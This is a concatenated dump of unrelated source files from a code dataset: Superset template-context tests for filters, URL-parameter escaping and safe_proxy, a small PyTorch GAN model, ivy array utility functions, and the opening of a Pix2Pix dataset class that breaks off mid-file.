"operator": "in",
"subject": "name",
}
],
}
)
}
):
cache = ExtraCache()
assert cache.filter_values("name") == ["foo", "bar"]
assert cache.applied_filters == ["name"]
def test_get_filters_adhoc_filters(app_context: AppContext) -> None:
with app.test_request_context(
data={
"form_data": json.dumps(
{
"adhoc_filters": [
{
"clause": "WHERE",
"comparator": "foo",
"expressionType": "SIMPLE",
"operator": "in",
"subject": "name",
}
],
}
)
}
):
cache = ExtraCache()
assert cache.get_filters("name") == [
{"op": "IN", "col": "name", "val": ["foo"]}
]
assert cache.removed_filters == []
assert cache.applied_filters == ["name"]
with app.test_request_context(
data={
"form_data": json.dumps(
{
"adhoc_filters": [
{
"clause": "WHERE",
"comparator": ["foo", "bar"],
"expressionType": "SIMPLE",
"operator": "in",
"subject": "name",
}
],
}
)
}
):
cache = ExtraCache()
assert cache.get_filters("name") == [
{"op": "IN", "col": "name", "val": ["foo", "bar"]}
]
assert cache.removed_filters == []
with app.test_request_context(
data={
"form_data": json.dumps(
{
"adhoc_filters": [
{
"clause": "WHERE",
"comparator": ["foo", "bar"],
"expressionType": "SIMPLE",
"operator": "in",
"subject": "name",
}
],
}
)
}
):
cache = ExtraCache()
assert cache.get_filters("name", remove_filter=True) == [
{"op": "IN", "col": "name", "val": ["foo", "bar"]}
]
assert cache.removed_filters == ["name"]
assert cache.applied_filters == ["name"]
def test_filter_values_extra_filters(app_context: AppContext) -> None:
with app.test_request_context(
data={
"form_data": json.dumps(
{"extra_filters": [{"col": "name", "op": "in", "val": "foo"}]}
)
}
):
cache = ExtraCache()
assert cache.filter_values("name") == ["foo"]
assert cache.applied_filters == ["name"]
def test_url_param_default(app_context: AppContext) -> None:
with app.test_request_context():
cache = ExtraCache()
assert cache.url_param("foo", "bar") == "bar"
def test_url_param_no_default(app_context: AppContext) -> None:
with app.test_request_context():
cache = ExtraCache()
assert cache.url_param("foo") is None
def test_url_param_query(app_context: AppContext) -> None:
with app.test_request_context(query_string={"foo": "bar"}):
cache = ExtraCache()
assert cache.url_param("foo") == "bar"
def test_url_param_form_data(app_context: AppContext) -> None:
with app.test_request_context(
query_string={"form_data": json.dumps({"url_params": {"foo": "bar"}})}
):
cache = ExtraCache()
assert cache.url_param("foo") == "bar"
def test_url_param_escaped_form_data(app_context: AppContext) -> None:
with app.test_request_context(
query_string={"form_data": json.dumps({"url_params": {"foo": "O'Brien"}})}
):
cache = ExtraCache(dialect=dialect())
assert cache.url_param("foo") == "O''Brien"
def test_url_param_escaped_default_form_data(app_context: AppContext) -> None:
with app.test_request_context(
query_string={"form_data": json.dumps({"url_params": {"foo": "O'Brien"}})}
):
cache = ExtraCache(dialect=dialect())
assert cache.url_param("bar", "O'Malley") == "O''Malley"
def test_url_param_unescaped_form_data(app_context: AppContext) -> None:
with app.test_request_context(
query_string={"form_data": json.dumps({"url_params": {"foo": "O'Brien"}})}
):
cache = ExtraCache(dialect=dialect())
assert cache.url_param("foo", escape_result=False) == "O'Brien"
def test_url_param_unescaped_default_form_data(app_context: AppContext) -> None:
with app.test_request_context(
query_string={"form_data": json.dumps({"url_params": {"foo": "O'Brien"}})}
):
cache = ExtraCache(dialect=dialect())
assert cache.url_param("bar", "O'Malley", escape_result=False) == "O'Malley"
def test_safe_proxy_primitive(app_context: AppContext) -> None:
def func(input_: Any) -> Any:
return input_
assert safe_proxy(func, "foo") == "foo"
def test_safe_proxy_dict(app_context: AppContext) -> None:
def func(input_: Any) -> Any:
return input_
assert safe_proxy(func, {"foo": "bar"}) == {"foo": "bar"}
def test_safe_proxy_lambda(app_context: AppContext) -> None:
def func(input_: Any) -> Any:
return input_
with pytest.raises(SupersetTemplateException):
safe_proxy(func, lambda: "bar")
def test_safe_proxy_nested_lambda(app_context: AppContext) -> None:
def func(input_: Any) -> Any:
return input_
with pytest.raises(SupersetTemplateException):
safe_proxy(func, {"foo": lambda: "bar"})
``` |
{
"source": "7wikd/GAN-Digit-Creator",
"score": 3
} |
#### File: GAN-Digit-Creator/Simple-GAN/model.py
```python
import torch
import torch.nn as nn
import torchvision
class Discriminator(nn.Module):
def __init__(self,in_features):
super().__init__()
self.disc = nn.Sequential(
nn.Linear(in_features,128),
nn.LeakyReLU(0.01),
nn.Linear(128, 1),
nn.Sigmoid()
)
def forward(self,x):
return self.disc(x)
class Generator(nn.Module):
def __init__(self,z_dim,img_dim):
super().__init__()
self.gen = nn.Sequential(
nn.Linear(z_dim, 256),
nn.LeakyReLU(0.01),
nn.Linear(256,img_dim),
nn.Tanh()
)
def forward(self,x):
return self.gen(x)
``` |
{
"source": "7wikd/ivy",
"score": 3
} |
#### File: backends/torch/set.py
```python
import torch
from typing import Tuple
from collections import namedtuple
def unique_inverse(x: torch.Tensor) \
-> Tuple[torch.Tensor, torch.Tensor]:
out = namedtuple('unique_inverse', ['values', 'inverse_indices'])
values, inverse_indices = torch.unique(x, return_inverse=True)
nan_idx = torch.isnan(x)
if nan_idx.any():
inverse_indices[nan_idx] = torch.where(torch.isnan(values))[0][0]
inverse_indices = inverse_indices.reshape(x.shape)
return out(values, inverse_indices)
def unique_values(x: torch.Tensor) \
-> torch.Tensor:
return torch.unique(x)
def unique_counts(x: torch.Tensor) \
-> Tuple[torch.Tensor, torch.Tensor]:
v, c = torch.unique(torch.reshape(x, [-1]), return_counts=True)
nan_idx = torch.where(torch.isnan(v))
c[nan_idx] = 1
uc = namedtuple('uc', ['values', 'counts'])
return uc(v, c)
```
#### File: functional/ivy/general.py
```python
import gc
import math
import einops
import inspect
import numpy as np
from numbers import Number
from typing import Callable, Any, Union, List, Tuple, Dict, Iterable, Optional
# local
import ivy
from ivy.functional.ivy.device import dev
from ivy.framework_handler import current_framework as _cur_framework
FN_CACHE = dict()
INF = float('inf')
TIMEOUT = 15.0
TMP_DIR = '/tmp'
def get_referrers_recursive(item, depth=0, max_depth=None, seen_set=None, local_set=None):
seen_set = ivy.default(seen_set, set())
local_set = ivy.default(local_set, set())
ret_cont = ivy.Container(
repr=str(item).replace(' ', ''), alphabetical_keys=False, keyword_color_dict={'repr': 'magenta'})
referrers = [ref for ref in gc.get_referrers(item) if
not (isinstance(ref, dict) and
min([k in ref for k in ['depth', 'max_depth', 'seen_set', 'local_set']]))]
local_set.add(str(id(referrers)))
for ref in referrers:
ref_id = str(id(ref))
if ref_id in local_set or hasattr(ref, 'cell_contents'):
continue
seen = ref_id in seen_set
seen_set.add(ref_id)
refs_rec = lambda: get_referrers_recursive(ref, depth + 1, max_depth, seen_set, local_set)
this_repr = 'tracked' if seen else str(ref).replace(' ', '')
if not seen and (not max_depth or depth < max_depth):
val = ivy.Container(
repr=this_repr, alphabetical_keys=False, keyword_color_dict={'repr': 'magenta'})
refs = refs_rec()
for k, v in refs.items():
val[k] = v
else:
val = this_repr
ret_cont[str(ref_id)] = val
return ret_cont
def is_native_array(x: Any, exclusive: bool = False)\
-> bool:
"""
Determines whether the input x is a Native Array.
:param x: The input to check
:type x: any
:param exclusive: Whether to check if the data type is exclusively an array, rather than a variable or traced array.
:type exclusive: bool, optional
:return: Boolean, whether or not x is an array.
"""
try:
return _cur_framework(x).is_native_array(x, exclusive)
except ValueError:
return False
def is_ivy_array(x: Any, exclusive: bool = False)\
-> bool:
"""
Determines whether the input x is an Ivy Array.
:param x: The input to check
:type x: any
:param exclusive: Whether to check if the data type is exclusively an array, rather than a variable or traced array.
:type exclusive: bool, optional
:return: Boolean, whether or not x is an array.
"""
return isinstance(x, ivy.Array) and ivy.is_native_array(x.data, exclusive)
# noinspection PyShadowingNames
def copy_array(x: Union[ivy.Array, ivy.NativeArray])\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Copy an array.
:param x: The array to copy
:type x: array
:return: A copy of the input array.
"""
return _cur_framework(x).copy_array(x)
def array_equal(x0: Union[ivy.Array, ivy.NativeArray], x1: Union[ivy.Array, ivy.NativeArray])\
-> bool:
"""
Determines whether two input arrays are equal across all elements.
:param x0: The first input array to compare.
:type x0: array
:param x1: The second input array to compare.
:type x1: array
:return: Boolean, whether or not the input arrays are equal across all elements.
"""
return _cur_framework(x0).array_equal(x0, x1)
def arrays_equal(xs: List[Union[ivy.Array, ivy.NativeArray]])\
-> bool:
"""
Determines whether input arrays are equal across all elements.
:param xs: Sequence of arrays to compare for equality
:type xs: sequence of arrays
:return: Boolean, whether or not all of the input arrays are equal across all elements.
"""
x0 = xs[0]
for x in xs[1:]:
if not array_equal(x0, x):
return False
return True
def all_equal(*xs: Iterable[Any], equality_matrix: bool = False)\
-> Union[bool, Union[ivy.Array, ivy.NativeArray]]:
"""
Determines whether the inputs are all equal.
:param xs: inputs to compare.
:type xs: any
:param equality_matrix: Whether to return a matrix of equalities comparing each input with every other.
Default is False.
:type equality_matrix: bool, optional
:return: Boolean, whether or not the inputs are equal, or matrix array of booleans if equality_matrix=True is set.
"""
equality_fn = ivy.array_equal if ivy.is_native_array(xs[0]) else lambda a, b: a == b
if equality_matrix:
num_arrays = len(xs)
mat = [[None for _ in range(num_arrays)] for _ in range(num_arrays)]
for i, xa in enumerate(xs):
for j_, xb in enumerate(xs[i:]):
j = j_ + i
res = equality_fn(xa, xb)
if ivy.is_native_array(res):
# noinspection PyTypeChecker
res = ivy.to_scalar(res)
# noinspection PyTypeChecker
mat[i][j] = res
# noinspection PyTypeChecker
mat[j][i] = res
return ivy.array(mat)
x0 = xs[0]
for x in xs[1:]:
if not equality_fn(x0, x):
return False
return True
def to_numpy(x: Union[ivy.Array, ivy.NativeArray])\
-> np.ndarray:
"""
Converts array into a numpy array.
:param x: Input array.
:type x: array
:return: A numpy array.
"""
return _cur_framework(x).to_numpy(x)
def to_scalar(x: Union[ivy.Array, ivy.NativeArray])\
-> Number:
"""
Converts an array with a single element into a scalar.
:param x: Input array with a single element.
:type x: array
:return: A scalar.
"""
return _cur_framework(x).to_scalar(x)
def to_list(x: Union[ivy.Array, ivy.NativeArray])\
-> List:
"""
Creates a (possibly nested) list from input array.
:param x: Input array.
:type x: array
:return: A list representation of the input array.
"""
return _cur_framework(x).to_list(x)
def clip_vector_norm(x: Union[ivy.Array, ivy.NativeArray], max_norm: float, p: float = 2.0)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Clips (limits) the vector p-norm of an array.
:param x: Input array containing elements to clip.
:type x: array
:param max_norm: The maximum value of the array norm.
:type max_norm: float
:param p: The p-value for computing the p-norm. Default is 2.
:type p: float, optional
:return: An array with the vector norm downscaled to the max norm if needed.
"""
norm = ivy.vector_norm(x, keepdims=True, ord=p)
ratio = ivy.stable_divide(max_norm, norm)
if ratio < 1:
return ratio * x
return x
def clip_matrix_norm(x: Union[ivy.Array, ivy.NativeArray], max_norm: float, p: float = 2.0)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Clips (limits) the matrix norm of an array.
:param x: Input array containing elements to clip.
:type x: array
:param max_norm: The maximum value of the array norm.
:type max_norm: float
:param p: The p-value for computing the p-norm. Default is 2.
:type p: float, optional
:return: An array with the matrix norm downscaled to the max norm if needed.
"""
norms = ivy.matrix_norm(x, p, keepdims=True)
ratios = ivy.maximum(ivy.stable_divide(max_norm, norms), 1.)
return ratios * x
def floormod(x: Union[ivy.Array, ivy.NativeArray], y: Union[ivy.Array, ivy.NativeArray])\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Returns element-wise remainder of division.
:param x: Input array to floormod.
:type x: array
:param y: Denominator input for floormod.
:type y: array
:return: An array of the same shape and type as x, with the elements floor modded.
"""
return _cur_framework(x).floormod(x, y)
def unstack(x: Union[ivy.Array, ivy.NativeArray], axis: int, keepdims: bool = False)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Unpacks the given dimension of a rank-R array into rank-(R-1) arrays.
:param x: Input array to unstack.
:type x: array
:param axis: Axis for which to unpack the array.
:type axis: int
:param keepdims: Whether to keep dimension 1 in the unstack dimensions. Default is False.
:type keepdims: bool, optional
:return: List of arrays, unpacked along specified dimensions.
"""
return _cur_framework(x).unstack(x, axis, keepdims)
def fourier_encode(x: Union[ivy.Array, ivy.NativeArray], max_freq: Union[float, Union[ivy.Array, ivy.NativeArray]],
num_bands: int = 4, linear: bool = False, concat: bool = True, flatten: bool = False)\
-> Union[ivy.Array, ivy.NativeArray, Tuple]:
"""
Pads an array with fourier encodings.
:param x: Input array to encode.
:type x: array
:param max_freq: The maximum frequency of the encoding.
:type max_freq: float
:param num_bands: The number of frequency bands for the encoding. Default is 4.
:type num_bands: int, optional
:param linear: Whether to space the frequency bands linearly as opposed to geometrically. Default is False.
:type linear: bool, optional
:param concat: Whether to concatenate the position, sin and cos values, or return seperately. Default is True.
:type concat: bool, optional
:param flatten: Whether to flatten the position dimension into the batch dimension. Default is False.
:type flatten: bool, optional
:return: New array with the final dimension expanded, and the encodings stored in this channel.
"""
x_in = x
dim = x.shape[-1]
x = ivy.expand_dims(x, -1)
orig_x = x
if linear:
scales = ivy.linspace(1., max_freq / 2, num_bands, dev=dev(x))
else:
if ivy.backend == 'torch' and isinstance(max_freq,float):
scales = ivy.logspace(0., ivy.log(ivy.array(max_freq / 2)) / math.log(10), num_bands, base=10, dev=dev(x))
else:
scales = ivy.logspace(0., ivy.log(max_freq / 2) / math.log(10), num_bands, base=10, dev=dev(x))
scales = ivy.astype(scales, ivy.dtype(x))
scales = scales[(*((None,) * (len(x.shape) - len(scales.shape))), Ellipsis)]
x = x * scales * math.pi
sin_x = ivy.sin(x)
cos_x = ivy.cos(x)
if flatten:
orig_x = x_in
sin_x = ivy.reshape(sin_x, [-1, num_bands*dim])
cos_x = ivy.reshape(cos_x, [-1, num_bands*dim])
if concat:
return ivy.concat([orig_x, sin_x, cos_x], -1)
return sin_x, cos_x
def value_is_nan(x: Union[ivy.Array, ivy.NativeArray, Number], include_infs: bool = True)\
-> bool:
"""
Determine whether the single valued array or scalar is of nan type
:param x: The input to check Input array.
:type x: array
:param include_infs: Whether to include infs and -infs in the check. Default is True.
:type include_infs: bool, optional
:return Boolean as to whether the input value is a nan or not.
"""
x_scalar = ivy.to_scalar(x) if ivy.is_native_array(x) else x
if not x_scalar == x_scalar:
return True
if include_infs and x_scalar == INF or x_scalar == -INF:
return True
return False
def has_nans(x: Union[ivy.Array, ivy.NativeArray], include_infs: bool = True)\
-> bool:
"""
Determine whether the array contains any nans, as well as infs or -infs if specified.
:param x: Input array.
:type x: array
:param include_infs: Whether to include infs and -infs in the check. Default is True.
:type include_infs: bool, optional
:return: Boolean as to whether the array contains nans.
"""
return value_is_nan(ivy.sum(x), include_infs)
def exists(x: Any)\
-> bool:
"""
Simple check as to whether the input is None or not.
:param x: Input to check.
:type x: any
:return: True if x is not None, else False.
"""
return x is not None
def default(x: Any, default_val: Any, catch_exceptions: bool = False, rev: bool = False, with_callable: bool = False)\
-> Any:
"""
Returns x provided it exists (is not None), else returns default value.
:param x: Input which may or may not exist (be None).
:type x: value if catch_exceptions=False else callable
:param default_val: The default value.
:type default_val: any
:param catch_exceptions: Whether to catch exceptions from callable x. Default is False.
:type catch_exceptions: bool, optional
:param rev: Whether to reverse the input x and default_val. Default is False.
:type rev: bool, optional
:param with_callable: Whether either of the arguments might be callable functions. Default is False.
:type with_callable: bool, optional
:return: x if x exists (is not None), else default.
"""
with_callable = catch_exceptions or with_callable
if rev:
tmp = x
x = default_val
default_val = tmp
if with_callable:
x_callable = callable(x)
default_callable = callable(default_val)
else:
x_callable = False
default_callable = False
if catch_exceptions:
# noinspection PyBroadException
try:
x = x() if x_callable else x
except Exception:
return default_val() if default_callable else default_val
else:
x = x() if x_callable else x
return x if exists(x) else default_val() if default_callable else default_val
def shape_to_tuple(shape: Union[int, Tuple[int], List[int]]):
"""
Returns a tuple representation of the input shape.
:param shape: The shape input to convert to tuple representation.
:retrn: The shape in tuple representation
"""
if isinstance(shape, int):
return (shape,)
else:
return tuple(shape)
def try_else_none(fn):
"""
Try and return the function, otherwise return None if an exception was raised during function execution.
:param fn: Function to try and call and return.
:type fn: callable
"""
return default(fn, None, True)
def arg_names(receiver):
"""
Get the expected keyword arguments for a function or class constructor.
"""
return list(inspect.signature(receiver).parameters.keys())
def match_kwargs(kwargs, *receivers, allow_duplicates=False):
"""
Match keyword arguments to either class or function receivers.
:param kwargs: Keyword arguments to match.
:type kwargs: dict of any
:param receivers: Functions and/or classes to match the keyword arguments to.
:type receivers: callables and/or classes
:param allow_duplicates: Whether to allow one keyword argument to be used for multiple receivers. Default is False.
:type allow_duplicates: bool, optional
:return: Sequence of keyword arguments split as best as possible.
"""
split_kwargs = list()
for receiver in receivers:
expected_kwargs = arg_names(receiver)
found_kwargs = {k: v for k, v in kwargs.items() if k in expected_kwargs}
if not allow_duplicates:
for k in found_kwargs.keys():
del kwargs[k]
split_kwargs.append(found_kwargs)
if len(split_kwargs) == 1:
return split_kwargs[0]
return split_kwargs
def cache_fn(func: Callable)\
-> Callable:
"""
Wrap a function, such that when cache=True is passed as an argument, a previously cached output is returned.
:param func: The function to wrap, whose output should be cached for later.
:type func: callable
:return: The newly cache wrapped function.
"""
global FN_CACHE
if func not in FN_CACHE:
FN_CACHE[func] = dict()
def cached_fn(*args, **kwargs):
key = ''.join([str(i) + ', ' for i in args] + [' kw, '] + [str(i) + ', ' for i in sorted(kwargs.items())])
cache = FN_CACHE[func]
if key in cache:
return cache[key]
ret = func(*args, **kwargs)
cache[key] = ret
return ret
return cached_fn
def current_framework_str()\
-> Union[str, None]:
"""
Return the string of the current globally set framework. Returns None if no framework is set.
:return: The framework string.
"""
fw = _cur_framework()
if fw is None:
return None
return fw.current_framework_str()
def einops_rearrange(x: Union[ivy.Array, ivy.NativeArray], pattern: str, **axes_lengths: Dict[str, int])\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Perform einops rearrange operation on input array x.
:param x: Input array to be re-arranged.
:type x: array
:param pattern: Rearrangement pattern.
:type pattern: str
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: New array with einops.rearrange having been applied.
"""
return einops.rearrange(x, pattern, **axes_lengths)
def einops_reduce(x: Union[ivy.Array, ivy.NativeArray], pattern: str, reduction: Union[str, Callable],
**axes_lengths: Dict[str, int]) -> Union[ivy.Array, ivy.NativeArray]:
"""
Perform einops reduce operation on input array x.
:param x: Input array to be reduced.
:type x: array
:param pattern: Reduction pattern.
:type pattern: str
:param reduction: One of available reductions ('min', 'max', 'sum', 'mean', 'prod'), or callable.
:type reduction: str or callable
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: New array with einops.reduce having been applied.
"""
return einops.reduce(x, pattern, reduction, **axes_lengths)
def einops_repeat(x: Union[ivy.Array, ivy.NativeArray], pattern: str, **axes_lengths: Dict[str, int])\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Perform einops repeat operation on input array x.
:param x: Input array to be repeated.
:type x: array
:param pattern: Rearrangement pattern.
:type pattern: str
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: New array with einops.repeat having been applied.
"""
return einops.repeat(x, pattern, **axes_lengths)
def get_min_denominator()\
-> float:
"""
Get the global minimum denominator used by ivy for numerically stable division.
"""
# noinspection PyProtectedMember
return ivy._MIN_DENOMINATOR
def set_min_denominator(val: float)\
-> None:
"""
Set the global minimum denominator used by ivy for numerically stable division.
:param val: The new value to set the minimum denominator to.
:type val: float
"""
ivy._MIN_DENOMINATOR = val
def get_min_base()\
-> float:
"""
Get the global minimum base used by ivy for numerically stable power raising.
"""
# noinspection PyProtectedMember
return ivy._MIN_BASE
def set_min_base(val: float)\
-> None:
"""
Set the global minimum base used by ivy for numerically stable power raising.
:param val: The new value to set the minimum base to.
:type val: float
"""
ivy._MIN_BASE = val
def stable_divide(numerator: Any, denominator: Any, min_denominator: float = None) -> Any:
"""
Divide the numerator by the denominator, with min denominator added to the denominator for numerical stability.
:param numerator: The numerator of the division.
:type numerator: any valid numerator, including containers
:param denominator: The denominator of the division.
:type denominator: any valid denominator, including containers
:param min_denominator: The minimum denominator to use, use global ivy._MIN_DENOMINATOR by default.
:type min_denominator: float, optional
:return: The new item following the numerically stable division.
"""
# noinspection PyProtectedMember
return numerator / (denominator + default(min_denominator, ivy._MIN_DENOMINATOR))
def stable_pow(base: Any, exponent: Any, min_base: float = None)\
-> Any:
"""
Raise the base by the power, with MIN_BASE added to the base when exponent > 1 for numerical stability.
:param base: The numerator of the division.
:type base: any valid numerator, including containers
:param exponent: The denominator of the division.
:type exponent: any valid denominator, including containers
:param min_base: The minimum base to use, use global ivy._MIN_BASE by default.
:type min_base: float, optional
:return: The new item following the numerically stable division.
"""
# noinspection PyProtectedMember
return (base + default(min_base, ivy._MIN_BASE)) ** exponent
def get_all_arrays_in_memory():
"""
Gets all arrays which are currently alive.
"""
all_arrays = list()
for obj in gc.get_objects():
# noinspection PyBroadException
try:
if ivy.is_native_array(obj):
all_arrays.append(obj)
except Exception:
pass
return all_arrays
def num_arrays_in_memory():
"""
Returns the number of arrays which are currently alive.
"""
return len(get_all_arrays_in_memory())
def print_all_arrays_in_memory():
"""
Prints all arrays which are currently alive.
"""
for arr in get_all_arrays_in_memory():
print(type(arr), arr.shape)
def set_queue_timeout(timeout):
"""
Set the global queue timeout values (in seconds). Default value without this function being called is 10 seconds.
:param timeout: The timeout to set in seconds.
:type timeout: float, optional
"""
global TIMEOUT
TIMEOUT = timeout
def queue_timeout():
"""
Get the global queue timeout values (in seconds). Default value without this function being called is 10 seconds.
"""
global TIMEOUT
return TIMEOUT
def tmp_dir():
"""
Return the directory for saving temporary files.
"""
return TMP_DIR
def set_tmp_dir(tmp_dr):
"""
Set the directory for saving temporary files.
"""
global TMP_DIR
TMP_DIR = tmp_dr
def container_types():
"""
Return all framework-specific types which should be hierarchically parsed in an ivy.Container. Such types must adopt
a key-value structure, and exposes public methods .keys(), .values() and items().
"""
# noinspection PyBroadException
try:
return _cur_framework().container_types()
except ValueError:
return []
def inplace_arrays_supported(f=None):
"""
Determine whether inplace arrays are supported for the current backend framework.
:return: Boolean, whether or not inplace arrays are supported.
"""
return _cur_framework().inplace_arrays_supported()
def inplace_variables_supported(f=None):
"""
Determine whether inplace variables are supported for the current backend framework.
:return: Boolean, whether or not inplace variables are supported.
"""
return _cur_framework().inplace_variables_supported()
def supports_inplace(x):
"""
Determine whether inplace operations are supported for the data type of x.
:param x: Input variable or array to check for inplace support for.
:type x: variable or array
:return: Boolean, whether or not inplace operations are supported for x.
"""
if ivy.is_variable(x):
return ivy.inplace_variables_supported()
elif ivy.is_native_array(x):
return ivy.inplace_arrays_supported()
raise Exception('Input x must be either a variable or an array.')
def assert_supports_inplace(x):
"""
Asserts that inplace operations are supported for x, else raises exception.
:param x: Input variable or array to check for inplace support for.
:type x: variable or array
:return: True if support, raises exception otherwise
"""
if not ivy.supports_inplace(x):
raise Exception('Inplace operations are not supported {} types with {} backend'.format(
type(x), ivy.current_framework_str()))
return True
def inplace_update(x, val):
"""
Perform in-place update for the input array. This will always be performed on ivy.Array instances pass in the input,
and will also be performed on the native array classes in the backend, when the backend supports this.
:param x: The variable to update.
:type x: variable
:param val: The array to update the variable with.
:type val: array
:return: The array following the in-place update.
"""
return _cur_framework(x).inplace_update(x, val)
def inplace_decrement(x, val):
"""
Perform in-place decrement for the input array.
:param x: The array to decrement.
:type x: array
:param val: The array to decrement the variable with.
:type val: array
:return: The array following the in-place decrement.
"""
return _cur_framework(x).inplace_decrement(x, val)
def inplace_increment(x, val):
"""
Perform in-place increment for the input array.
:param x: The array to increment.
:type x: array
:param val: The array to increment the variable with.
:type val: array
:return: The array following the in-place increment.
"""
return _cur_framework(x).inplace_increment(x, val)
def cumsum(x: Union[ivy.Array, ivy.NativeArray], axis: int = 0)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Returns the cumulative sum of the elements along a given axis.
:param x: Input array.
:type x: array
:param axis: Axis along which the cumulative sum is computed. By default 0.
:type axis: int
:return: Input array with cumulatively summed elements along axis.
"""
return _cur_framework(x).cumsum(x, axis)
def cumprod(x: Union[ivy.Array, ivy.NativeArray], axis: int = 0, exclusive: bool = False)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Returns the cumulative product of the elements along a given axis.
:param x: Input array.
:type x: array
:param axis: Axis along which the cumulative product is computed. By default 0.
:type axis: int
:param exclusive: Whether to perform the cumprod exclusively. Defaults is False.
:type exclusive: bool, optional
:return: Input array with cumulatively multiplied elements along axis.
"""
return _cur_framework(x).cumprod(x, axis, exclusive)
# noinspection PyShadowingNames
def scatter_flat(indices: Union[ivy.Array, ivy.NativeArray], updates: Union[ivy.Array, ivy.NativeArray],
size: Optional[int] = None, tensor: Optional[Union[ivy.Array, ivy.NativeArray]] = None,
reduction: str = 'sum', dev: ivy.Device = None)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Scatter flat updates into a new flat array according to flat indices.
:param indices: Indices for the new values to occupy.
:type indices: array
:param updates: Values for the new array to hold.
:type updates: array
:param size: The size of the result.
:type size: int
:param tensor: The tensor in which to scatter the results, default is None, in which case the size is used to
scatter into a zeros array.
:param reduction: The reduction method for the scatter, one of 'sum', 'min', 'max' or 'replace'
:type reduction: str
:param dev: device on which to create the array 'cuda:0', 'cuda:1', 'cpu' etc. Same as updates if None.
:type dev: ivy.Device, optional
:return: New array of given shape, with the values scattered at the indices.
"""
return _cur_framework(indices).scatter_flat(indices, updates, size, tensor, reduction, dev)
# noinspection PyShadowingNames
def scatter_nd(indices: Union[ivy.Array, ivy.NativeArray], updates: Union[ivy.Array, ivy.NativeArray],
shape: Optional[Iterable[int]] = None, tensor: Optional[Union[ivy.Array, ivy.NativeArray]] = None,
reduction: str = 'sum', dev: ivy.Device = None)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Scatter updates into a new array according to indices.
:param indices: Indices for the new values to occupy.
:type indices: array
:param updates: Values for the new array to hold.
:type updates: array
:param shape: The shape of the result. Default is None, in which case tensor argument must be provided.
:type shape: sequence of ints
:param tensor: The tensor in which to scatter the results, default is None, in which case the shape arg is used to
scatter into a zeros array.
:param reduction: The reduction method for the scatter, one of 'sum', 'min', 'max' or 'replace'
:type reduction: str
:param dev: device on which to create the array 'cuda:0', 'cuda:1', 'cpu' etc. Same as updates if None.
:type dev: ivy.Device, optional
:return: New array of given shape, with the values scattered at the indices.
"""
return _cur_framework(indices).scatter_nd(indices, updates, shape, tensor, reduction, dev)
# noinspection PyShadowingNames
def gather(params: Union[ivy.Array, ivy.NativeArray], indices: Union[ivy.Array, ivy.NativeArray], axis: int = -1,
dev: ivy.Device = None) -> Union[ivy.Array, ivy.NativeArray]:
"""
Gather slices from params at axis according to indices.
:param params: The array from which to gather values.
:type params: array
:param indices: Index array.
:type indices: array
:param axis: The axis from which to gather from. Default is -1.
:type axis: int, optional
:param dev: device on which to create the array 'cuda:0', 'cuda:1', 'cpu' etc. Same as x if None.
:type dev: ivy.Device, optional
:return: New array with the values gathered at the specified indices along the specified axis.
"""
return _cur_framework(params).gather(params, indices, axis, dev)
# noinspection PyShadowingNames
def gather_nd(params: Union[ivy.Array, ivy.NativeArray], indices: Union[ivy.Array, ivy.NativeArray],
dev: ivy.Device = None) -> Union[ivy.Array, ivy.NativeArray]:
"""
Gather slices from params into a array with shape specified by indices.
:param params: The array from which to gather values.
:type params: array
:param indices: Index array.
:type indices: array
:param dev: device on which to create the array 'cuda:0', 'cuda:1', 'cpu' etc. Same as x if None.
:type dev: ivy.Device, optional
:return: New array of given shape, with the values gathered at the indices.
"""
return _cur_framework(params).gather_nd(params, indices, dev)
def multiprocessing(context: str = None):
"""
Return framewrk-specific multi-processing module
:param context: The context of the multiprocessing, either fork, forkserver or spawn. Default is None.
:type context: str, optional
:return: Multiprocessing module
"""
return _cur_framework().multiprocessing(context)
def indices_where(x: Union[ivy.Array, ivy.NativeArray])\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Returns indices or true elements in an input boolean array.
:param x: Boolean array, for which indices are desired.
:type x: array
:return: Indices for where the boolean array is True.
"""
return _cur_framework(x).indices_where(x)
# noinspection PyShadowingNames
def one_hot(indices: Union[ivy.Array, ivy.NativeArray], depth: int, dev: ivy.Device = None)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Returns a one-hot array
:param indices: Indices for where the ones should be scattered *[batch_shape, dim]*
:type indices: array
:param depth: Scalar defining the depth of the one-hot dimension.
:type depth: int
:param dev: device on which to create the array 'cuda:0', 'cuda:1', 'cpu' etc. Same as x if None.
:type dev: ivy.Device, optional
:return: Tensor of zeros with the same shape and type as a, unless dtype provided which overrides.
"""
return _cur_framework(indices).one_hot(indices, depth, dev)
def shape(x: Union[ivy.Array, ivy.NativeArray], as_array: bool = False)\
-> Iterable[int]:
"""
Returns the shape of the array x.
:param x: Input array to infer the shape of.
:type x: array
:param as_array: Whether to return the shape as a array, default False.
:type as_array: bool, optional
:return: Shape of the array
"""
return _cur_framework(x).shape(x, as_array)
def get_num_dims(x: Union[ivy.Array, ivy.NativeArray], as_array: bool = False) -> int:
"""
Returns the number of dimensions of the array x.
:param x: Input array to infer the number of dimensions for.
:type x: array
:param as_array: Whether to return the shape as a array, default False.
:type as_array: bool, optional
:return: Shape of the array
"""
return _cur_framework(x).get_num_dims(x, as_array)
``` |
{
"source": "7wikd/Pix2Pix-PyTorch",
"score": 3
} |
#### File: 7wikd/Pix2Pix-PyTorch/dataset.py
```python
import numpy as np
import config
import os
from PIL import Image
from torch.utils.data import Dataset, DataLoader
from torchvision.utils import save_image
class MyDataset(Dataset):
def __init__(self,root_dir):
self.root_dir = root_dir
self.list_files = os.listdir(self.root_dir)
def __len__(self):
return len(self.list_files)
def __getitem__(self, index):
img_file = self.list_files[index]
img_path = os.path.join(self.root_dir,img_file)
image = np.array(Image.open(img_path))
input_image = image[:,511:,:]
